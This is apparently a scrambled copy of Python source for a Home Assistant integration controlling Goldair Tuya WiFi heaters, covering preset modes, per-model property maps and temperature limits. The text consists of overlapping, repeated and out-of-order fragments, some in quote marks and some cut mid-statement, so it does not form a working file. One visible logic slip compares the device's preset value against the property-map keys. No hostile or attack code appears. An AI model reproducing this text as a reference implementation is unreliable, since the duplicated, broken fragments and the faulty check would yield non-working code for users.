device (GoldairTuyaDevice): The device API", "ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = {", "homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE,", "maximum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None", "'1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101',", "'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation", "return None def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not", "ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO =", "37 }, STATE_ECO: { 'min': 5, 'max': 21 } } # self._model =", "import ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE", "<= limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must be between ' f'{limits[\"min\"]} and", "def hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE])", "elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the current temperature.\"\"\"", "name (str): The device's name. 
device (GoldairTuyaDevice): The device API instance.\"\"\" self._device =", "return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property", "the supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the", "import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import", "power level.\"\"\" new_level = swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power", "temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def", "**kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE)", "\"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature", "self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT:", "available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode", "'106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE:", "\"\"\"Return the list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set", "}, STATE_ECO: { 'min': 5, 'max': 21 } } # self._model = model", "= self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <= limits['max']: raise 
ValueError( f'Target temperature", "dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode", "'min': 5, 'max': 21 } } # self._model = model # _LOGGER.info(f'Setting model", "heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater. Args: name (str): The device's name.", "not in keys: _LOGGER.debug(f'Could not load correct preset mode from api status. Defaulting", "({target_temperature}) must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT:", "set the temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <=", "{json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else:", "\"\"\"Return the supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return", "STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property", "\"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC mode,", "the list of supported features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return the polling", "| SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\" def", "'min': 5, 'max': 37 }, STATE_ECO: { 'min': 5, 'max': 21 } }", "'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1',", "ie Comfort, Eco, 
Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not", "def name(self): \"\"\"Return the name of the climate device.\"\"\" return self._device.name @property def", "correct preset mode from api status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID", "PROPERTY_TO_DPS_ID depending on the model of the heater you have\"\"\" if self._device.model ==", "STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode]", "False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF'", "\"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else:", "= swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level", "def should_poll(self): \"\"\"Return the polling state.\"\"\" return True @property def name(self): \"\"\"Return the", "target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You", "The device's name. 
device (GoldairTuyaDevice): The device API instance.\"\"\" self._device = device self._support_flags", "if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level]", ") from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT,", "STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys())", "to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the model", "you have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def", "\"\"\"Return current HVAC mode, ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode", "from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from", "} POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1', '2': '2', '3': '3', '4':", "ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT:", "else: return None @property def target_temperature_step(self): \"\"\"Return the supported step of target temperature.\"\"\"", "WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater. 
Args: name (str): The device's", "temperature ({target_temperature}) must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode ==", "target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot", "in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <= limits['max']:", "swing_mode): \"\"\"Set new power level.\"\"\" new_level = swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys():", "ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE =", "\"\"\"Return the name of the climate device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return", "limits['min'] <= target_temperature <= limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must be between", "def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return", "preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def", "and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO:", "GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def preset_modes(self): \"\"\"Return the list of available", "\"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\"", "is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if 
kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature):", "_LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO", "{ 'min': 5, 'max': 21 } } # self._model = model # _LOGGER.info(f'Setting", "preset_mode(self): \"\"\"Return current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys", "ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE,", "set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if", "@property def preset_mode(self): \"\"\"Return current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode =", "preset mode from api status. 
Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was:", "mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode", "'2': '2', '3': '3', '4': '4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS =", "POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level] self._device.set_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL], dps_level) def update(self):", "@property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the model of the", "mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the power level.\"\"\"", "temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat or", "{ STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop',", "device's name. 
device (GoldairTuyaDevice): The device API instance.\"\"\" self._device = device self._support_flags =", "self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat or Off.\"\"\" dps_mode", "'4': '4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE |", "dps_mode) @property def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode", "( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import (", "} } # self._model = model # _LOGGER.info(f'Setting model to {model}') @property def", "== STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE])", "STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1':", "self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\"", "temperature we try to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode", "self._device.name @property def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit @property def", "depending on the model of the heater you have\"\"\" if self._device.model == \"GECO270\":", "climate device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return", "Comfort') 
_LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is", "self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature in Anti-freeze", "device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min':", "STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1', '2':", "a Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater. Args: name (str):", "target_temperature(self): \"\"\"Return the temperature we try to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return", "if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property def", "current HVAC mode, ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is", "power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level =", "return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list of supported features.\"\"\" return self._support_flags", "PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6',", "return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self): \"\"\"Return the supported step of", "True @property def name(self): \"\"\"Return the name of the climate device.\"\"\" return self._device.name", "list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode)", "== 
ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return", "instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = {", "if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode", "the temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature", "temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <=", "try to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO:", "5, 'max': 37 }, STATE_ECO: { 'min': 5, 'max': 21 } } #", "\"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else:", "of the heater you have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return", "@property def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self):", "Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater. 
Args: name (str): The", "def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE))", "( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice", "f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode ==", "current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id)", "@property def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode ==", "ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE:", "SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair", "self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return", "= 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER =", "ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON:", "in keys: _LOGGER.debug(f'Could not load correct preset mode from api status. 
Defaulting to", "supported features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return the polling state.\"\"\" return True", "HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE", "new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not", "{model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the model of", "ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' }", "'6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } #", "'1': '1', '2': '2', '3': '3', '4': '4', '5': '5', 'Auto': 'auto' }", "dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return", "\"\"\"Return the list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set", "STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2',", "return None @property def target_temperature_step(self): \"\"\"Return the supported step of target temperature.\"\"\" return", "\"\"\"Set new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return", "Goldair WiFi Heater device. 
\"\"\" import logging import json from homeassistant.const import (", "else: return None @property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and", "{ HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO',", "API instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS =", "ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER", "load correct preset mode from api status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode},", "should_poll(self): \"\"\"Return the polling state.\"\"\" return True @property def name(self): \"\"\"Return the name", "'Stop': 'stop', '1': '1', '2': '2', '3': '3', '4': '4', '5': '5', 'Auto':", "dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current preset mode, ie", "not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def preset_modes(self): \"\"\"Return the", "set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def", "'stop', '1': '1', '2': '2', '3': '3', '4': '4', '5': '5', 'Auto': 'auto'", "@property def hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat or Off.\"\"\" dps_mode =", "if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return", ") if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], 
target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature)", "set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level = swing_mode if new_level not in", "{ ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12',", "if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def", "Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if", "'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_'", "return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if", "None @property def target_temperature_step(self): \"\"\"Return the supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP", "'2', '3': '3', '4': '4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE", "else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list of supported features.\"\"\" return", "_LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is not", "'3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104',", "= 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4',", "ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON", "available preset modes.\"\"\" return 
list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode", "supported_features(self): \"\"\"Return the list of supported features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return", "= 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE =", "!= STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self): \"\"\"Return the maximum", "'105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE:", "raise ValueError( f'Target temperature ({target_temperature}) must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' )", "state.\"\"\" return True @property def name(self): \"\"\"Return the name of the climate device.\"\"\"", "model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the", "else: return None @property def preset_modes(self): \"\"\"Return the list of available preset modes.\"\"\"", "ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE:", "STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\"", "'1', '2': '2', '3': '3', '4': '4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS", "ValueError('You cannot set the temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not", "GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', 